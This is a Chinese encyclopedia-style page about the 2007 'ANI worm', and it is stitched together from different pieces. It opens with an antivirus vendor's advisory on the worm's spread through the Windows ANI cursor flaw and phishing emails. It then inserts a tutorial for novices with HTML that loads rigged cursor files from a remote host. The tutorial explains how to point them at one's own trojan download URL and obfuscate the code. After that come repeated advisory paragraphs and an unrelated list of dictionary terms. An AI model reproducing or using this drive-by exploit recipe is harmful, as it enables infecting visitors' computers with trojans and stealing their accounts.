§ 病毒简介

ani蠕虫病毒与“熊猫烧香”非常相似的高危病毒，命名为“ANI蠕虫（Worm.DlOnlineGames.a）”。

该病毒不光传播和危害方式与“熊猫烧香”病毒非常相似，还利用了上周末才刚出现的Vista、XP等操作系统的ANI高危漏洞。根据瑞星客户服务中心的统计，短短24小时内，已接到大量用户的求助。鉴于该病毒可能会广泛传播并且危害较为严重，瑞星发出今年第一个“橙色安全警报”（二级）。

瑞星反病毒专家分析，被“ANI蠕虫”感染的电脑会从网上下载多种木马(木马查杀软件下载)、后门病毒，使得用户游戏等账号被盗，或者电脑变成被黑客控制的“肉鸡”。同时，染毒电脑还会发出大量带毒邮件，邮件的题目是：“你和谁视频的时候被拍下的？给你笑死了！”邮件内容为“看你那小样！我看你是出名了！你看这个地址！你的脸拍的那么清楚！你变明星了！http://****.microfsot.com/***/134952.htm”，收到邮件的用户点击这个网址就会被感染。

病毒作者使用国内某网站的邮箱散发病毒，并且邮件内容也为中文，因此基本可以确定该病毒为国人编写。此外，该病毒跟“熊猫烧香”病毒一样，也会感染网页文件并加入病毒代码。如果网站编辑的计算机被该病毒感染，将网页文件上传到网站，那么访问该网站用户就会被感染。

更为严重的是，“熊猫烧香”利用的是老的系统漏洞，用户安装好系统补丁就可防范；而“ANI蠕虫”病毒则采用了上周才被发现的ANI漏洞进行传播，该漏洞存在于Windows Vista、XP等主流操作系统中，目前微软还没有提供补丁程序。

针对此恶性病毒，瑞星杀毒软件已经升级，19.16.60版本以上即可对其进行彻底查杀。瑞星安全专家提醒广大用户，除了升级杀毒软件、打开实时监控以外，上网时还应该打开个人防火墙，阻止病毒自动下载恶意程序。

ani网马生成器

1、病毒作者制作恶意ANI文件，使其能下载其它的病毒或木马程序；

2、病毒作者会将ANI文件更名为Jpeg、Bmp、Gif等常见图片文件放到网页中；

3、当用户利用IE浏览器访问这些网页时会自动将该ANI文件下载到本地；

4、IE浏览器在打开该ANI文件时，即可触发漏洞，并立即下载和执行其它的病毒或木马程序。

目前微软尚未公布ani漏洞的处理办法，请各位电脑用户这段时间避免进入一些陌生网站！

这个漏洞是Microsoft Windows Cursor and Icon Format Remote Code Execution (0day)   为了方便广大菜鸟 特发出此漏洞的代码和使用方法！以下就是了～

代码没有经过加密，所以大家需要自行加密了，加密很简单把这段代码用ASCII字符替换就行了！“测试文件.htm”代码如下：

（使用记事本打开编辑即可）

将这段代码：

【Copy to clipboard】CODE:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML><HEAD>

<META http-equiv=Content-Type content="text/html; charset=big5">

<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>

<BODY>

<DIV style="CURSOR: url('http://www.exediy.cn/a.jpg';)">

<DIV

style="CURSOR: url('http://www.exediy.cn/b.jpg';)"></DIV></DIV></BODY></HTML>

先把那两个“http://www.exediy.cn/”改为你的FTP空间地址，就是你上传a.jpg 和b.jpg 文件的地址，然后用ASCII代码加密，加密然后复制－－粘贴，替换掉原来的相应代码就行了－－保存。

剩下需要更改的就是 a.jpg和b.jpg 这两个文件，大家用“记事本”分别打开这两个JPG文件，然后可以看到最后面为“http://www.exediy.cn/a.exe” 这两个文件后面都是这个地址，现在大家可以把这个地址替换掉！比如你的木马地址为“http://www.xxx.com/163.exe” 我们就将这两个文件中的地址都替换为“http://www.xxx.com/163.exe”

替换后如下：

【Copy to clipboard】CODE:

RIFF    ACONanih$   $

============================================================================================================

更为严重的是，“熊猫烧香”利用的是老的系统漏洞，用户安装好系统补丁就可防范；而“ANI蠕虫”病毒则采用了上周才被发现的ANI漏洞进行传播，该漏洞存在于Windows Vista、XP等主流操作系统中，目前微软还没有提供补丁程序。

针对此恶性病毒，瑞星杀毒软件已经升级，19.16.60版本以上即可对其进行彻底查杀。瑞星安全专家提醒广大用户，除了升级杀毒软件、打开实时监控以外，上网时还应该打开个人防火墙，阻止病毒自动下载恶意程序。

瑞星安全专家指出，该漏洞影响WindowsXP以上操作系统和IE6以上浏览器，微软最新Vista和IE7都不能幸免。这是Vista第一次爆出重大漏洞，“利用该漏洞传播病毒的网站正逐步增多，攻击代码很可能已公开”。

安全厂家提醒，普通网民不要轻易登陆陌生网站，尤其是通过电子邮件、聊天软件等发来的陌生网址；网站管理员则应加强对服务器日志管理，尤其要注意不明来源ANI及JPG等格式图片文件。此外，电脑用户应及时升级杀毒软件，上网时打开杀毒软件实时监控。

§ 相关词条

防毒

• 众功
• 众务
• 众募
• 众包
• 众匹
• 众医
• 众匿
• 众卒
• 众口一词
• 众口一辞
• 众口交传
• 众口交攻
• 众口交詈
• 众口交赞
• 众口相传
• 众口销金
• 众史
• 众合潜能
• 众和合尊者
• 众喣漂山
• 众喣飘山
• 众圣
• 众地
• 众垤
• 众士